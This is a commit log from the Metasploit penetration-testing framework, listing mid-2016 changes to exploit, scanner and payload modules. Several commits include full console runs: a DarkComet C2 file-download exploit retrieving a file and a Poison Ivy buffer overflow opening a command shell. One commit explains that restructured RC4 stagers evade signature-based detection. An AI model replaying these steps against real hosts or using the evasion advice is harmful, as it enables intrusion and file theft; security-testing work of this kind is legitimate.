earthquake
5f4153308c
one line aligned to the others, space replaced to tabs
2016-06-09 20:52:20 +02:00
wchen-r7
207d92a125
Use scan to do regex capture
2016-06-09 11:07:00 -05:00
wchen-r7
1b4a6a7981
Use the UDP mixin so it can clean up properly
2016-06-09 11:04:50 -05:00
Crypt0-M3lon
233186c833
Check presence in local admin group
...
As the "is_admin?" function only checks if the current session effectively has admin rights, I offer to add a check to know if the current user is in the local admin group using the "is_in_admin_group?" function. This information is better suited to check if admin rights are obtainable using the "bypassuac" module.
2016-06-09 17:47:09 +02:00
samvartaka
ba6d00cee2
This module exploits a publicly known vulnerability in the C2 server of DarkComet versions 3.2 and up
...
(https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf) which allows
an attacker to download arbitrary files from the DarkComet C2. The vulnerability possibly affects versions
prior to 3.2 as well. The vulnerability can be exploited without knowledge of the shared secret key
by abusing a flaw in the cryptographic protocol to carry out a limited version of the exploit allowing
for key recovery, after which the exploit can be used to download arbitrary files from a DarkComet C2 server.
See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware
for details.
See https://mega.nz/#!wlZkSJLK!NI_Z-9UoPBQ0MDEYXLVr1wUJyVV70qVprWqSUol_53k
for the DarkComet 5.3.1 C2 server / builder
See https://mega.nz/#!AxRmkQLb!MVjwua3qrzgyXq7vUWSxISwVE7vQ8rEJbexieb8s0Ro
for the DarkComet 4.2F C2 server / builder (archive password is 'tr')
## Console output
Below is an example of the exploit running against versions 5.3.1 and 4.2F
(DarkComet C2 server password is set to 'darkcometpass' and unknown to attacker).
### Version 5.3.1 (unknown password)
```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options
Module options (auxiliary/gather/darkcomet_filedownloader):
Name          Current Setting  Required  Description
----          ---------------  --------  -----------
BRUTETIMEOUT  1                no        Timeout (in seconds) for bruteforce attempts
KEY                            no        DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
LHOST         0.0.0.0          yes       This is our IP (as it appears to the DarkComet C2 server)
NEWVERSION    true             no        Set to true if DarkComet version >= 5.1, set to false if version < 5.1
RHOST         0.0.0.0          yes       The target address
RPORT         1604             yes       The target port
STORE_LOOT    true             no        Store file in loot (will simply output file to console if set to false).
TARGETFILE                     no        Target file to download (assumes password is set)
msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102
LHOST => 192.168.0.102
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - C2 server uses password [darkcometpass]
[*] 192.168.0.104:1604 - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC51#-890darkcometpass
KEY => #KCMDDC51#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - omgsecret
[*] Auxiliary module execution completed
```
### Version 4.2F (unknown password)
```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options
Module options (auxiliary/gather/darkcomet_filedownloader):
Name          Current Setting  Required  Description
----          ---------------  --------  -----------
BRUTETIMEOUT  1                no        Timeout (in seconds) for bruteforce attempts
KEY                            no        DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
LHOST         0.0.0.0          yes       This is our IP (as it appears to the DarkComet C2 server)
NEWVERSION    true             no        Set to true if DarkComet version >= 5.1, set to false if version < 5.1
RHOST         0.0.0.0          yes       The target address
RPORT         1604             yes       The target port
STORE_LOOT    true             no        Store file in loot (will simply output file to console if set to false).
TARGETFILE                     no        Target file to download (assumes password is set)
msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102
LHOST => 192.168.0.102
msf auxiliary(darkcomet_filedownloader) > set NEWVERSION false
NEWVERSION => false
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - Missing 1 bytes of keystream ...
[*] 192.168.0.104:1604 - Initiating brute force ...
[*] 192.168.0.104:1604 - C2 server uses password [darkcometpass]
[*] 192.168.0.104:1604 - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC42F#-890darkcometpass
KEY => #KCMDDC42F#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - omgsecret
[*] Auxiliary module execution completed
```
2016-06-09 14:42:25 +02:00
ssyy201506
d470371694
fix the available size of payload for exploit/windows/local/payload_injection
2016-06-09 13:40:25 +09:00
wchen-r7
7cdadca79b
Land #6945, Add struts_dmi_rest_exec exploit
2016-06-08 23:16:46 -05:00
h00die
6f5edb08fe
pull uri from datastore consistently
2016-06-08 20:28:36 -04:00
William Vu
37efff59ce
Land #6949, hash fix for filezilla_client_cred
2016-06-08 15:21:03 -05:00
wchen-r7
f0bb125556
Should be print_error
2016-06-08 14:22:36 -05:00
William Vu
600704c053
Merge remote-tracking branch 'upstream/pr/6939'
2016-06-08 14:22:33 -05:00
wchen-r7
52bcade72c
Fix #6948, Modules using the SMB client are printing peer twice
...
Fix #6948
2016-06-08 12:16:50 -05:00
wwebb-r7
ab27c1b701
Merge pull request #6940 from samvartaka/master
...
Exploit for previously unknown stack buffer overflow in Poison Ivy versions 2.1.x (possibly present in older versions too)
2016-06-08 11:25:51 -05:00
Adam Compton
158176aa05
replaced "if !" on line 41 with "unless"
...
replaced "$1" on line 51 with "Regexp.last_match(1)"
restructured the print statement on line 56 to more closely match suggestion
removed "self." from line 71
changed line 78 to loop for 2 seconds instead of 1 second
2016-06-08 09:28:08 -04:00
Crypt0-M3lon
eaaa9177d5
Fix "username" key to add login in creds database
2016-06-08 10:38:38 +02:00
wchen-r7
f13d91f685
Fix a prob of printing an empty rhost from the scanner mixin
2016-06-07 19:19:39 -05:00
wchen-r7
e8304e684c
Bring #6793 up to date with upstream-master
2016-06-07 19:04:32 -05:00
wchen-r7
6ae4d1576e
Apply fixes to symantec_brightmail_ldapcreds.rb
2016-06-07 19:01:58 -05:00
samvartaka
5260031991
Modifications based on suggestions by @wchen-r7
2016-06-08 01:17:15 +02:00
Adam Compton
75a34c4aca
added a new aux module to quickly scan for Jenkins servers on the local broadcast network by sending out a udp packet to port 33848 on the broadcast address. Any Jenkins server should respond with XML data containing the Jenkins server version.
2016-06-07 16:57:06 -04:00
dmohanty-r7
9450906ca4
Correctly set Dummy param
2016-06-07 14:42:51 -05:00
dmohanty-r7
f47128ccdd
Cleanup canon_irav_pwd_extract module
2016-06-07 14:31:37 -05:00
Brendan Watters
c4aa99fdac
Land #6925, ipfire proxy exec
2016-06-07 10:24:59 -05:00
Brendan Watters
7e84c808b2
Merge remote-tracking branch 'upstream/pr/6924' into dev
2016-06-07 09:24:25 -05:00
wchen-r7
b59d10d9c4
Land #6929, Add HP Data Protector Encrypted Comms exploit
2016-06-06 22:45:53 -05:00
wchen-r7
60c60bf004
Minor cosmetic changes
2016-06-06 22:45:00 -05:00
Vex Woo
e4c55f97db
Fix module desc
2016-06-06 10:40:36 -05:00
Vex Woo
9f19d2c210
add apache struts2 S2-033 rce module
2016-06-06 05:07:48 -05:00
amarionette
4354b5d5d6
Changed class from Metasploit3 to MetasploitModule
2016-06-03 17:43:41 -07:00
amarionette
99790e343d
Removed debug statement
2016-06-03 17:36:00 -07:00
h00die
c2699ef194
rubocop fixes
2016-06-03 17:43:11 -04:00
h00die
2f837d5d60
fixed EDB spelling
2016-06-03 17:17:36 -04:00
h00die
8d76bdb8af
fixed EDB reference
2016-06-03 17:13:36 -04:00
Brendan Watters
d7cd10f586
Suggested updates for style and clarity
2016-06-03 14:04:58 -05:00
Brendan Watters
91658d2a61
Changes per rubocop and sinn3r
2016-06-03 12:42:38 -05:00
samvartaka
8ca571aee3
no message
2016-06-03 19:29:55 +02:00
samvartaka
0114d2cf0b
This module exploits a publicly known vulnerability in the C2 server of DarkComet versions 3.2 and up
...
(https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf), possibly affecting
earlier versions as well. The vulnerability can be exploited without knowledge of the secret key
by abusing a flaw in the cryptographic protocol to carry out a limited version of the exploit allowing
for key recovery after which the exploit can be used to download arbitrary files from a DarkComet C2 server.
See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware
for details.
## Console output
Below is an example of the exploit running against versions 5.3.1 and 4.2F
(DarkComet C2 server password is set to 'darkcometpass' and unknown to attacker).
### Version 5.3.1 (unknown password)
```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options
Module options (auxiliary/gather/darkcomet_filedownloader):
Name          Current Setting  Required  Description
----          ---------------  --------  -----------
BRUTETIMEOUT  1                no        Timeout (in seconds) for bruteforce attempts
KEY                            no        DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
LHOST         0.0.0.0          yes       This is our IP (as it appears to the DarkComet C2 server)
NEWVERSION    true             no        Set to true if DarkComet version >= 5.1, set to false if version < 5.1
RHOST         0.0.0.0          yes       The target address
RPORT         1604             yes       The target port
STORE_LOOT    true             no        Store file in loot (will simply output file to console if set to false).
TARGETFILE                     no        Target file to download (assumes password is set)
msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102
LHOST => 192.168.0.102
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - C2 server uses password [darkcometpass]
[*] 192.168.0.104:1604 - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC51#-890darkcometpass
KEY => #KCMDDC51#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - omgsecret
[*] Auxiliary module execution completed
```
### Version 4.2F (unknown password)
```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options
Module options (auxiliary/gather/darkcomet_filedownloader):
Name          Current Setting  Required  Description
----          ---------------  --------  -----------
BRUTETIMEOUT  1                no        Timeout (in seconds) for bruteforce attempts
KEY                            no        DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
LHOST         0.0.0.0          yes       This is our IP (as it appears to the DarkComet C2 server)
NEWVERSION    true             no        Set to true if DarkComet version >= 5.1, set to false if version < 5.1
RHOST         0.0.0.0          yes       The target address
RPORT         1604             yes       The target port
STORE_LOOT    true             no        Store file in loot (will simply output file to console if set to false).
TARGETFILE                     no        Target file to download (assumes password is set)
msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102
LHOST => 192.168.0.102
msf auxiliary(darkcomet_filedownloader) > set NEWVERSION false
NEWVERSION => false
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - Missing 1 bytes of keystream ...
[*] 192.168.0.104:1604 - Initiating brute force ...
[*] 192.168.0.104:1604 - C2 server uses password [darkcometpass]
[*] 192.168.0.104:1604 - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC42F#-890darkcometpass
KEY => #KCMDDC42F#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - omgsecret
[*] Auxiliary module execution completed
```
2016-06-03 19:24:56 +02:00
samvartaka
290e1eb0fa
This module exploits a previously unknown stack buffer overflow vulnerability
...
in Poison Ivy versions 2.1.x (possibly present in older versions too) and doesn't
require knowledge of the secret key as it abuses a flaw in the cryptographic protocol.
Note that this is a different vulnerability from the one affecting versions 2.2.0 and up
(https://www.rapid7.com/db/modules/exploit/windows/misc/poisonivy_bof).
See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware
for details.
## Console output
Below is an example of the exploit running against a 2.1.4 C2 server (PIVY C2 server password is
set to 'pivypass' and unknown to attacker).
### Version 2.1.4
```
msf > use windows/misc/poisonivy_21x_bof
msf exploit(poisonivy_21x_bof) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf exploit(poisonivy_21x_bof) > check
[*] 192.168.0.104:3460 The target appears to be vulnerable.
msf exploit(poisonivy_21x_bof) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(poisonivy_21x_bof) > exploit
[*] 192.168.0.104:3460 - Performing handshake...
[*] Started bind handler
[*] 192.168.0.104:3460 - Sending exploit...
[*] Command shell session 1 opened (192.168.0.102:56272 -> 192.168.0.104:4444) at 2016-06-03 12:34:02 -0400
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.1.4\Poison Ivy 2.1.4>
```
2016-06-03 19:20:06 +02:00
Brent Cook
5420848c49
Land #6922, add popen() additional vector to ImageMagick exploit (imagemagick_delegate)
2016-06-03 08:06:07 -05:00
Brent Cook
f034952852
Land #6918, Added additional SAP TCP/IP ports into the sap_port_info function.
2016-06-03 08:01:04 -05:00
Brent Cook
d371fd0798
Land #6885, add aux control module for PhoenixContact PLCs
2016-06-03 07:50:39 -05:00
wchen-r7
f333481fb8
Add vendor patch info
2016-06-02 16:41:06 -05:00
wchen-r7
7c9227f70b
Cosmetic changes for magento_unserialize to pass msftidy & guidelines
2016-06-02 16:34:41 -05:00
dmohanty-r7
a15c79347b
Add canon printer credential harvest module
...
Praedasploit
2016-06-02 16:07:28 -05:00
William Vu
9128ba3e57
Add popen() vuln to ImageMagick exploit
...
So... we've actually been sitting on this vuln for a while now. Now that
the cat's out of the bag [1], I'm updating the module. :)
Thanks to @hdm for his sharp eye. ;x
[1] http://permalink.gmane.org/gmane.comp.security.oss.general/19669
2016-06-02 11:35:37 -05:00
mr_me
4f42cc8c08
Added module
2016-06-02 09:24:10 -05:00
h00die
68d647edf1
Merge branch 'master' of https://github.com/rapid7/metasploit-framework into op5
2016-06-01 18:05:18 -04:00
h00die
52d5028548
op5 config exec
2016-06-01 15:07:31 -04:00
a-marionette
7f92088242
Revised the SQL query for the exploits/unix/webapps/joomla_content_history_sqli_rce.rb. The exploit is now working for me.
2016-06-01 09:47:32 -07:00
root
d72492fe30
Add support for older Data Protector versions
...
Increases support by enabling all SSL ciphers. Some older versions
of DP only support weaker export ciphers not enabled by default.
2016-06-01 10:45:47 +01:00
sho-luv
98cfcc65ae
Added IP address to returned information.
...
This scanner module doesn't tell you the location of the found information. So when using the -R option to fill the RHOSTS all you get is a bunch of successful findings, however you won't know to which systems they belong.
2016-05-31 19:47:00 -07:00
Ian Lovering
eb2398a446
Renamed hp_dataprotector_encrypted_comms
...
Renamed to match other data protector exploits
2016-05-31 22:58:32 +01:00
Ian Lovering
54c4771626
Exploit for HP Data Protector Encrypted Comms
...
Added exploit for HP Data Protector when using encrypted communications.
This has been tested against v9.00 on Windows Server 2008 R2 but should also work against older versions of DP.
2016-05-31 22:44:14 +01:00
wchen-r7
fb678564b1
Land #6923, Check the correct check code for ms13_081_track_popup_menu
2016-05-31 11:40:02 -05:00
h00die
8ce59ae330
travis fixes
2016-05-31 05:46:20 -04:00
h00die
057947d7e8
ipfire proxy exec
2016-05-30 10:24:17 -04:00
h00die
9b5e3010ef
doc/module cleanup
2016-05-30 06:33:48 -04:00
h00die
df55f9a57c
first add of ipfire shellshock
2016-05-29 20:40:12 -04:00
Tijl Deneut
2afcda9d49
Did some more rubocopy work and
...
added module documentation
2016-05-28 15:32:18 +02:00
wchen-r7
504a94bf76
Technically, this is form auth, not http auth
2016-05-27 18:39:25 -05:00
wchen-r7
14adcce8bf
Missed the HTTPUSERNAME fix
2016-05-27 18:37:04 -05:00
wchen-r7
61f9cc360b
Correct casing - should be HttpUsername and HttpPassword
2016-05-27 18:31:54 -05:00
wchen-r7
7f643a7b8d
Fix syntax error
2016-05-27 18:05:24 -05:00
wchen-r7
4dcddb2399
Fix #4885, Support basic and form auth at the same time
...
When a module uses the HttpClient mixin but registers the USERNAME
and PASSWORD datastore options in order to perform a form auth,
it ruins the ability to also perform a basic auth (sometimes it's
possible to see both). To avoid option naming conflicts, basic auth
options are now HTTPUSERNAME and HTTPPASSWORD.
Fix #4885
2016-05-27 16:25:42 -05:00
Bruno Morisson
01a691a46c
Update sap_router_portscanner.rb
...
Added additional SAP TCP/IP ports for sap_port_info function.
ref: https://wiki.scn.sap.com/wiki/display/TCPIP/Services
2016-05-27 14:43:16 +01:00
wchen-r7
fb95abc645
Land #6909, Add WordPress Ninja Forms unauthenticated file upload
2016-05-25 15:40:10 -05:00
wchen-r7
14e1baf331
Minor style changes
2016-05-25 15:39:26 -05:00
rastating
19c4d5b02b
Remove hard coded target path
2016-05-25 18:04:26 +01:00
William Webb
028b1ac251
Land #6816 Oracle Application Testing Suite File Upload
2016-05-24 18:27:10 -05:00
William Vu
3dfdf1d936
Land #6528, tilde expansion and more for OptPath
2016-05-24 16:01:59 -05:00
Jon Hart
48c25dd863
Remove need for expand_path in this module; normalize handles it now
2016-05-24 13:30:12 -07:00
Jon Hart
3df4c38e82
Use correct key file var
2016-05-24 13:28:08 -07:00
Brendan Watters
77a62ff7c0
Land #6905 RC4 Stagers
2016-05-24 09:34:32 -05:00
Brendan Watters
af86d63498
Updated Cache size
2016-05-24 09:07:05 -05:00
Brendan Watters
f0b945e4c4
Updated cache size
2016-05-24 09:06:46 -05:00
Brendan Watters
d328258db4
Updated Cache size
2016-05-24 09:06:28 -05:00
Brent Cook
5c6b93c1cf
Land #6883, Add Ubiquiti airOS exploit
2016-05-24 07:26:40 -05:00
William Vu
ca76e8f290
Update allwinner_backdoor report_vuln hash
2016-05-24 00:57:37 -05:00
Brent Cook
5bf8891c54
Land #6882, fix moodle_cmd_exec HTML parsing to use REX
2016-05-23 23:25:22 -05:00
Brent Cook
266d29ca4a
handle garbage better during probe
2016-05-23 22:28:31 -05:00
Brent Cook
a6020ca010
style fixes
2016-05-23 22:14:57 -05:00
Brent Cook
928a706135
Land #6890, Allwinner CPU kernel module local privilege escalation
2016-05-23 22:00:52 -05:00
Brent Cook
2f8562fba4
added documentation and minor style tweaks
2016-05-23 21:59:44 -05:00
rastating
adb8098b8c
Fix typo
2016-05-24 00:16:04 +01:00
rastating
aae7c25603
Add WordPress Ninja Forms unauthenticated file upload module
2016-05-23 23:47:41 +01:00
h00die
4242bbdf55
change report_note to report_vuln per note
2016-05-23 17:36:50 -04:00
Brent Cook
2694907b79
update cached payload size
2016-05-23 14:30:43 -05:00
RageLtMan
cf62218139
Update payload sizes
2016-05-23 14:27:11 -05:00
RageLtMan
efc64eaa5f
Implement reverse_tcp_rc4_dns payload in metasm
...
Using the ruby methods for generating assembly blocks defined or
separated in prior commits, create a new payload from the existing
assembly blocks which performs a DNS lookup of the LHOST prior to
establishing a corresponding socket and downloading, and
decrypting the RC4 encrypted payload.
For anyone looking to learn how to build these payloads, these
three commits should provide a healthy primer. Small changes to
the payload structure can yield entropy enough to avoid signature
based detection by in-line or out-of-band static defenses. This
payload was completed in the time between this commit and the last.
Testing:
Win2k8r2
ToDo:
Update payload sizes when this branch is "complete"
Ensure UUIDs and adjacent black magic all work properly
2016-05-23 14:27:11 -05:00
RageLtMan
0e69040a6a
Implement reverse_tcp_dns as metasm payload
...
Using the separation of block_recv and reverse_tcp, implement
reverse_tcp_dns using original shellcode as template with dynamic
injection of parameters. Concatenate the whole thing in the
generation call chain, and compile the resulting shellcode for
delivery.
Metasploit module pruned to bare minimum, with the LHOST OptString
moved into the library component.
Testing:
Win2k8r2
ToDo:
Update payload sizes when this branch is "complete"
Ensure UUIDs and adjacent black magic all work properly
Misc:
Clean up rc4.rb to use the rc4_keys method when generating a
stage. Makes the implementation far more readable and reduces
redundant code.
2016-05-23 14:27:11 -05:00
RageLtMan
df2346d9e0
Implement RC4 metasm payloads for tcp bind and rev
...
Convert reverse_tcp_rc4 and bind_tcp_rc4 from static shellcode
substitution payloads to metasm compiled assembly approach.
Splits up metasm methods for bind_tcp and reverse_tcp into socket
creation and block_recv to allow for reuse of the socket methods
with the RC4 payloads, while substituting the block_recv methods
for those carrying the appropriate decryptor stubs.
Creates a new rc4 module carrying the bulk of the decryptor and
adjacent convenience methods for standard payload generation.
Testing:
Tested against Win2k8r2, Win7x64, and WinXPx86
ToDo:
Ensure all the methods around payload sizing, UUIDs, and other
new functionality, the semantics of which I do not yet fully
understand, are appropriate and do not introduce breakage.
2016-05-23 14:27:11 -05:00
Spencer McIntyre
7e34d1e1cf
Land #6897, use sendall python rtcp shell with ssl
2016-05-21 16:51:10 -04:00
William Vu
6581fbd294
Add note about "mf" malware
...
This is the malware I found upon shelling my friend's device.
2016-05-20 23:09:10 -05:00
Brent Cook
b613dfefb4
Land #6896, fix spelling in caidao_bruteforce_login
2016-05-19 21:54:06 -05:00
root
a71e853c2a
Fixed cache size for python/shell_reverse_tcp_ssl
2016-05-20 02:32:37 +00:00
root
87398d5195
Fixed python reverse shell ssl send for EOF occurred in violation of protocol error
2016-05-20 01:49:04 +00:00
wchen-r7
506356e15d
Land #6889, check #nil? and #empty? instead of #empty?
2016-05-19 19:23:04 -05:00
wchen-r7
99a573a013
Do unless instead of "if !" to follow the Ruby guideline
2016-05-19 19:21:45 -05:00
h00die
706d51389e
spelling fix
2016-05-19 19:30:18 -04:00
William Vu
a16f4b5167
Return nil properly in rescue
...
Missed this because I copypasta'd myself.
2016-05-19 15:35:38 -05:00
William Vu
d018bba301
Store SSH key as a note
...
I know, I know, it should use the creds model. >:[
2016-05-19 15:12:58 -05:00
William Vu
9f738c3e41
Add note about overwritten files
2016-05-19 15:07:27 -05:00
William Vu
8fccb26446
Add Ubiquiti airOS exploit
...
Thanks to my friend wolf359 for providing a test device!
2016-05-19 14:50:20 -05:00
ssyy201506
31bbcfca49
Fix ms13_081_track_popup_menu
2016-05-19 17:22:47 +09:00
h00die
c621f689b2
more descriptive note per @sempervictus
2016-05-18 19:08:01 -04:00
Vex Woo
b5284375a7
osb_uname_jlist - NoMethodError undefined method 'empty?' for nil:NilClass
2016-05-18 00:16:53 -05:00
Vex Woo
11fedd7353
ca_totaldefense_regeneratereports - NoMethodError undefined method 'empty?' for nil:NilClass
2016-05-18 00:15:28 -05:00
Vex Woo
a6405beeda
ams_hndlrsvc - NoMethodError undefined method 'empty?' for nil:NilClass
2016-05-18 00:13:40 -05:00
Vex Woo
41bcdcce61
fix struts_code_exec_exception_delegator - NoMethodError undefined method 'empty?' for nil:NilClass
2016-05-18 00:11:57 -05:00
Vex Woo
bc257ea628
fix struts_code_exec - NoMethodError undefined method 'empty?' for nil:NilClass
2016-05-18 00:10:32 -05:00
Vex Woo
68b83c6e3a
datastore['CMD'].blank?
2016-05-17 23:56:59 -05:00
h00die
815a2600a8
additional description
2016-05-17 22:07:33 -04:00
h00die
640e0b9ff7
working ready for pr
2016-05-17 21:58:32 -04:00
Vex Woo
a4e7e373f3
fix ams_xfr.rb - NoMethodError undefined method 'empty?' for nil:NilClass
2016-05-17 17:55:18 -05:00
Tijl Deneut
36a9ef83ab
Added phoenix_command.rb
2016-05-17 15:45:45 +02:00
wchen-r7
e8ac568352
doesn't look like we're using the tcp mixin
2016-05-17 03:15:26 -05:00
wchen-r7
08394765df
Fix #6879, REXML::ParseException No close tag for /div
2016-05-17 03:14:00 -05:00
William Vu
9c61490676
Fix some inconsistencies
...
Failed to catch these while editing. :(
2016-05-17 02:50:12 -05:00
Jon Hart
92d07f74ff
Remove unnecessary double expand_path
2016-05-16 17:34:12 -07:00
Jon Hart
8bccfef571
Fix merge conflict
2016-05-16 17:29:45 -07:00
Brent Cook
cf0176e68b
Land #6867, Add Dell SonicWALL Scrutinizer 11.0.1 MethodDetail SQL Injection
2016-05-16 19:00:10 -05:00
Vex Woo
4a4904149b
ruby conditional operator -> expression
2016-05-16 10:45:04 -05:00
Vex Woo
4a3ab9d464
add a module for netcore/netdis udp 53413 backdoor
2016-05-16 02:11:53 -05:00
wchen-r7
3ea2f62376
Land #6875, update description for auxiliary/spoof/nbns/nbns_response
2016-05-15 12:34:53 -05:00
wchen-r7
8e85e8f9d7
Land #6859, Add TP-Link sc2020n Module
2016-05-15 12:33:54 -05:00
sho-luv
5361aaadbd
Update nbns_response.rb
...
Just correcting the description section of this module
2016-05-14 15:24:38 -07:00
Brent Cook
21d74a64fe
Land #6874, Improve exploit for CVE-2016-0854
2016-05-14 11:08:17 -05:00
Brent Cook
0d176f2c92
remove a couple of unnecessary ternary ops
2016-05-14 11:07:43 -05:00
Brent Cook
c7cbaa08c8
Land #6576, add Search Engine Subdomains Collector (Bing / Yahoo / ..)
2016-05-14 10:50:53 -05:00
Brent Cook
2e3e4f0069
Land #6296, Added a multi-platform post module to generate TCP & UDP egress traffic
2016-05-14 00:03:00 -05:00
Brent Cook
3542d907f7
simplify description, move the bulk of documentation to documentation/
2016-05-14 00:01:51 -05:00
Brent Cook
8ce0365c7f
See rapid7/metasploit-payloads#98, update cached payload sizes
2016-05-13 23:05:34 -05:00
Brent Cook
d398419971
Land #6832, Check LHOST value before running shell_to_meterpreter, add docs
2016-05-13 22:50:22 -05:00
h00die
314d73546c
additional details, not working on tablet via malicious apk meterpreter
2016-05-13 23:12:44 -04:00
Brent Cook
a940481f62
Land #6834, Authorized FTP JCL exploit for z/OS
2016-05-13 21:29:45 -05:00
Brent Cook
5c494480e6
handle failure more gracefully
2016-05-13 21:29:25 -05:00
wchen-r7
3b5db26ff5
Fix #6872, change upload action for CVE-2016-0854 exploit
...
This patch includes the following changes:
* Instead of the uploadFile action, this patch uses uploadImageCommon
to be able to support both Advantech WebAccess builds: 2014 and
2015.
* It uses an explicit check instead of the passive version check.
* It cleans up the malicious file after getting a session.
* Added module documentation to explain the differences between
different builds of Advantech WebAccess 8.0s, and 8.1.
Fix #6872
2016-05-13 19:47:18 -05:00
h00die
5099124f3d
module compiles, fails correctly but can't yet verify it works
2016-05-12 22:18:43 -04:00
Bigendian Smalls
2d5cf6cfe4
Authorized FTP JCL exploit for z/OS
...
This exploit module allows a user with credentials to execute JCL on a
vulnerable mainframe system running z/OS and an appropriately configured
FTP server.
2016-05-12 14:46:31 -05:00
Brent Cook
a69432abe5
update module class and move to recon from manage
2016-05-12 12:42:04 -05:00
Brent Cook
9f923cdb00
Merge branch 'master' into land-6296-egress
2016-05-12 12:36:47 -05:00
wchen-r7
8f9762a3e5
Fix some comments
2016-05-12 00:19:18 -05:00
wchen-r7
da293081a9
Fix a typo
2016-05-11 22:48:23 -05:00
wchen-r7
9d128cfd9f
Add Dell SonicWALL Scrutinizer 11.0.1 MethodDetail SQL Injection
2016-05-11 22:27:18 -05:00
Nicholas Starke
4b23d2dc58
Adjusting exception handling
...
This commit adjusts the error handling to close the socket before
calling fail_with and adds specific exceptions to catch
2016-05-11 17:18:51 -05:00
HD Moore
32e1a19875
Fix up the disclosure date
2016-05-11 00:18:22 -05:00
HD Moore
ded79ce1ff
Fix CVE syntax
2016-05-10 23:18:45 -05:00
HD Moore
4a5d150716
Fixups to continue supporting Rails 4.2.x
2016-05-10 23:12:48 -05:00
HD Moore
04bb493ccb
Small typo fixed
2016-05-10 23:07:51 -05:00
Nicholas Starke
32ae3e881e
Adding save_cred and exception handling to module
...
This commit adds a save_cred method for saving off the credentials
upon a successful login attempt. Also, exception handling surrounding
the opening of the telnet socket has been added to avoid any accidental
resource leaking.
2016-05-10 20:54:44 -05:00
HD Moore
7c6958bbd8
Rework rails_web_console_v2_code_exec to support CVE-2015-3224
2016-05-10 11:08:02 -05:00
wchen-r7
3db72e9b4b
Land #6853, use send_request_cgi! for CVE-2016-0854 exploit
2016-05-09 16:10:04 -05:00
Brent Cook
57a3a2871b
remove various session manipulation hacks since session.platform should always contain an os identifier
2016-05-08 22:39:41 -05:00
Nicholas Starke
8eb3193941
Adding TP-Link sc2020n Module
...
This module exploits a command injection vulnerability in
TP-Link sc2020n network video cameras in order to start the
telnet daemon on a random port. The module then connects to
the telnet daemon, which returns a root shell on the device.
2016-05-08 14:02:50 -05:00
Kyle Gray
2a546d191f
Land #6854, smtp header fix
...
Fixes an issue with duplicate headers when sending emails.
Fixes MS-1476
2016-05-06 12:07:12 -05:00
William Vu
2abb062070
Clean up module
2016-05-06 11:51:29 -05:00
David Maloney
e4e6246692
Merge branch 'master' of github.com:rapid7/metasploit-framework
2016-05-06 10:55:52 -05:00
Louis Sato
8dc7de5b84
Land #6838, add Rails web-console module
2016-05-05 15:53:52 -05:00
William Vu
1bc2ec9c11
Update vulnerable versions to include 6.x (legacy)
2016-05-05 14:18:42 -05:00
William Vu
26b749ff5a
Add default LHOST
...
This is a massive workaround and probably shouldn't be done. :-)
2016-05-05 14:18:42 -05:00
